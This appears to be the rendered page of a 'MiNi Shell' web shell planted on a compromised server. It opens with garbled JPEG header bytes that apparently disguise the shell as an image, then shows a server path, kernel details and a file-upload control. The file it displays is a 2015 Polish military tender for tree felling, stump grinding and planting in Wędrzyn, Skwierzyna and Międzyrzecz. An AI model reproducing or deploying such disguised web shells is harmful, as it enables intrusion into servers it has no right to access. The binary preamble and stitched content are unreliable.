JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150810/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150810/204020-N-2015.html

<p class="kh_header"><b>Wędrzyn: Wycinka drzew, obmiar brakarski, prace pielęgnacyjne, nasadzenia drzew, frezowanie pni na terenie administrowanym przez 45WOG (garnizon Wędrzyn, Skwierzyna, Międzyrzecz).</b><br>
<b>Numer ogłoszenia: 204020 - 2015; data zamieszczenia: 10.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 5701 Wędrzyn , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycinka drzew, obmiar brakarski, prace pielęgnacyjne, nasadzenia drzew, frezowanie pni na terenie administrowanym przez 45WOG (garnizon Wędrzyn, Skwierzyna, Międzyrzecz)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Przedmiotem zamówienia jest usługa polegająca na wycince drzew, obmiarze brakarski, pracach pielęgnacyjne, nasadzeniach drzew, frezowaniu pni na terenie administrowanym przez 45WOG (garnizon Wędrzyn, Skwierzyna, Międzyrzecz).
Wycinka:
- Wykonawca dokona wycinki drzew na które Zamawiający posiada decyzje administracyjne 
Niezbędny jest posiadany potencjał techniczny (tj. minimum 2szt. pilarek mechanicznych, samochód z urządzeniem do pracy na wysokości, pojazd transportowy do drewna - biorący udział w realizacji przedsięwzięcia, urządzenie do rozdrabniania gałęzi, urządzenie do frezowania pni po wycince);
- Jeżeli Wykonawca będzie realizował zamówienie w sposób wadliwy albo sprzeczny 
z umową, Zamawiający ma prawo wezwać go do usunięcia wad lub zmiany sposobu wykonania i wyznaczyć mu w tym celu odpowiedni termin, potwierdzając ten fakt na piśmie.
-Wykonawca zobowiązuje się na własny koszt usunąć wady spowodowane przez siebie 
w trakcie realizacji zamówienia, dokonując poprawek bądź ponownego wykonania wadliwie wykonanej usługi, w terminie wyznaczonym przez przedstawiciela Zamawiającego.
- Drewno (poza żywotnikami, daglezjami, świerkami do 30cm obwodu, akacjami, topolami oraz egzemplarzami porażonymi , spróchniałymi i posuszami) należy pociąć na odcinki 4m, pozostałe (w tym gałęzie grube i konary) na 1m odcinki-w Wędrzynie i Skwierzynie, 
w Międzyrzeczu  na odcinki 0,5m.
- Po wycince, w każdym garnizonie Wykonawca dokona obmiaru uzyskanego drewna przy udziale Zamawiającego co pisemnie potwierdzone zostanie na stosownym protokole uzyskania drewna (m.p.) ilości 4m i oddzielnie 1 m, i 0,5m odcinki w Międzyrzeczu.
- Wykonawca zwiezie materiał przy obecności magazyniera i przekaże do magazynów 45 WOG (SOI Wędrzyn, SOI Skwierzyna. SOI Międzyrzecz-odległość do 2km od miejsca wycinki) na miejsce czasowego magazynowania na terenie kompleksu wojskowego składając drewno wg gatunku i rozmiaru. 

Obmiar brakarski
- Po wycince, w każdym garnizonie Wykonawca dokona obmiaru brakarskiego z uzyskanego drewna potwierdzonego przez uprawnionego brakarza przy udziale Zamawiającego co pisemnie potwierdzone zostanie na stosownym protokole uzyskania drewna (zał nr 3) ( m.p.) ilości 4m i oddzielnie 1 m; 0,5m odcinki w Międzyrzeczu.
- Wykonawca zwiezie materiał przy obecności magazyniera i przekaże do magazynów 45 WOG ( SOI Wędrzyn, SOI Skwierzyna, SOI Międzyrzecz-odległość do 2km od miejsca wycinki) na miejsce czasowego magazynowania na terenie kompleksu wojskowego składając drewno wg gatunku i rozmiaru. Po złożeniu drewna na magazynie uporządkuje po sobie teren. 
Przy obmiarze, określi klasę drewna opałowego i tartacznego (np.: S, W) wg aktualnie obowiązujących cen  tj. zgodnie z Zarządzeniem  Nadleśniczego Nadleśnictwa w sprawie ustalenia cen na drewno do sprzedaży detalicznej w 2015r. 
Prace pielęgnacyjne 
- Wszystkie cięcia sanitarne, techniczne, prześwietlające  prowadzone w koronach drzew, winny być wykonane zgodnie ze sztuką ogrodniczą. 
Cięcia sanitarne obejmują usunięcie konarów obumarłych, nadłamanych, cięcia techniczne-wchodzących w kolizję z obiektami budowlanymi, liniami napowietrznymi, wzdłuż ciągów komunikacyjnych; cięcia prześwietlające służą rozluźnieniu zagęszczonej korony, zmniejszeniu oporu siły wiatru.
- Cięcia drzew w miarę potrzeb, wykonać usuwając do 20% masy asymilacyjnej drzewa, cięcia grubych gałęzi traktować jako ostateczność oraz po ich wykonaniu zabezpieczyć -ranę- odpowiednim środkiem grzybobójczym. 

Frezowanie pni
-Frezowanie winno być wykonane przy użyciu sprzętu mechanicznego-frezarki do pni, frezowanie pni i korzeni powierzchniowych należy wykonać 10 cm poniżej poziomu gruntu 
a  po frezowaniu wyrównać teren poprzez  zasypanie ziemią nierówności i zagrabienie, uprzątnie  gałęzie po uprzednim ich zrębkowaniu i wywiezie je z terenu wykonywania usługi.

Wycinka samosiejek wraz z karczowaniem m2 
Usuwanie samosiejek nie przekraczających 10 lat wyrażone w m2.  
-usuwanie i karczowanie należy rozumieć usuwanie samosiejek i krzewów wraz z korzeniami w celu oczyszczenia gruntu ,
-po wykarczowaniu należy uzupełnić ubytki gleby wraz z wyrównaniem i wygrabieniem terenu prac. 
-roboty związane z wykorzystaniem sprzętu mechanicznego lub urządzeń technicznych wcześniej winny być konsultowane z zamawiającym celem uniknięcia uszkodzenia instalacji biegnących w gruncie.

Nasadzenia wraz z otuliną ochronną na drzewko
-Wykonawca dokona we wskazanym miejscu przez Zamawiającego nasadzenia:
g. Wędrzyn: 	483 szt	 drzew + 2szt krzewy		 
g. Międzyrzecz: 	   8 szt	 drzew 
g. Skwierzyna : 	 19 szt	 drzew
-Wykonawca dostarczy materiał sadzeniowy zdrowy, o prostym pniu: 
a)drzewka- o obwodzie 12cm na wysokości 130cm, korona prawidłowo uformowana charakterystyczna dla gatunku, system korzeniowy prawidłowo wykształcony,
b) krzewy-o wysokości minimum 100cm, 3-5 prawidłowo wykształcone pędy z typowymi dla gatunku rozgałęzieniami,
-we wskazanych przez zamawiającego miejscach; wykopy wg wskazań soi wykona bez mechanicznych świdrów. Miejsce nasadzenia zaprawi odpowiednią ziemią (krzewy glebą próchniczą żyzną, lekko kwaśną, a glebę wokół wyściółkuje korą o średnicy 1-2cm.) 
-Wykonawca  dokona nasadzeń zgodnie ze sztuką ogrodniczą, oraz podlewać je będzie  wodą 
w ilości 100 l-szt.
-drzewka winny być palikowane z 3 stron oraz obwiązane taśmą elastyczna parcianą o szer. nie mniejszej niż 3cm. Wysokość palika powinna być równa wysokości pnia posadzonego drzewka a palik osadzony w gruncie od strony najczęściej wiejących wiatrów. 
-na drzewkach zastosować na pień  otulinę- siatkę chroniącą drzewko przed gryzoniami do wysokości pnia 0,5m koloru zielonego lub czarnego z tworzywa sztucznego, ażurowa umożliwiająca cyrkulację powietrza. Wielkość oczka siatki  3mm-5mm, ; stosując osiatkowanie należy -osłonę- umieścić częściowo w ziemi tak aby skutecznie chroniła przed gryzoniami. Osłonka powinna dopasowywać się do obwodu pnia wraz z jej wzrostem , czyli np. owijana wokół pnia.
-sadzonki winny być w dobrej kondycji, bryła korzeniowa prawidłowo uformowana, wolna od szkodników.
-na nasadzenia Wykonawca udziela Zamawiającemu 3-letniej gwarancji określonej kartą gwarancyjną wystawioną dla każdego garnizonu oddzielnie (załącznik nr nr 1 do umowy). 

Gospodarowanie odpadami 
Wykonawca jest wytwórcą odpadów powstałych w wyniku realizacji usługi i ponosi pełną odpowiedzialność za ich zgodne z prawem zagospodarowanie
Wykonawca zobowiązany jest do porządkowania terenu po wykonaniu usługi na terenie danej jednostki wojskowej, ze szczególnym uwzględnieniem dróg i ich przejezdności, z terminem sukcesywnego wywozu biomasy nie później niż jeden dzień po wykonaniu usługi na danej jednostce wojskowej.
Szczegółowy zakres prac i miejsca wykonywania poszczególnych prac znajduje się na stronie Zamawiającego w SIWZ rozdział IV.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.16.00-8, 77.21.15.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 35.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności, jeżeli złoży oświadczenie, o którym mowa w art. 44 ustawy Pzp (Załącznik nr 2 do SIWZ) oraz dokumenty wymienione w rozdziale VII niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi wykaz usług wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału  w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych usług, określających, czy usługi te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane należycie  i prawidłowo ukończone. 
Wykonawca wykaże dowody należytego wykonania co najmniej trzech usług odpowiadających przedmiotowi zamówienia, z której każda z nich będzie opiewała na kwotę minimalną  200 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonych dokumentów:
Oświadczenia o posiadanym potencjale technicznym tj.: minimum 2 sztuki pilarek mechanicznych, samochód z urządzeniem do pracy na wysokości, pojazd transportowy do drewna, urządzenie do frezowania (Załącznik nr 2);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonych dokumentów:
-Oświadczenia oraz dokumentów potwierdzające  uprawnienia do pracy w zawodzie drwala - operator pilarki,( zgodnie  z § 21 i § 22 Rozporządzenia Ministra Środowiska z dnia 24 sierpnia 2006r. w sprawie bezpieczeństwa i higieny pracy przy wykonywaniu prac z zakresu gospodarki leśnej, Dz.U. z dnia 08.09.2006r. Nr 161, poz. 1141 ) dla minimum dwóch osób uczestniczących w realizacji zamówienia.( Załącznik nr 2);
-Wykaz osób (załącznik nr 5)
- Oświadczenia o wyznaczeniu koordynatora BHP( Załącznik nr 6).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej                         i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów: 
1.	opłaconej polisy , a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - obejmujący naprawy i szkody powstałe w czasie wykonania usługi na gwarantowaną sumę ubezpieczenia w wysokości minimum 400 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełnione i podpisane dokumenty według wzorów zawartych w załącznikach do niniejszego SIWZ, tj: 
 Załącznik nr 1 - formularz ofertowy 
 Załącznik nr 5- wykaz osób
 Załącznik nr 6 - oświadczenie koordynatora BHP
 Załącznik nr 8 - oświadczenie podmiotu użyczającego zasoby</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin realizacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.45wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 45 Wojskowy Oddział Gospodarczy  
69-211 Wędrzyn, bud. nr 33 pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2015 godzina 08:45, miejsce: 45 Wojskowy Oddział Gospodarczy  
69-211 Wędrzyn, bud. nr 33 II piętro Kancelaria Jawna pokój nr 211.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com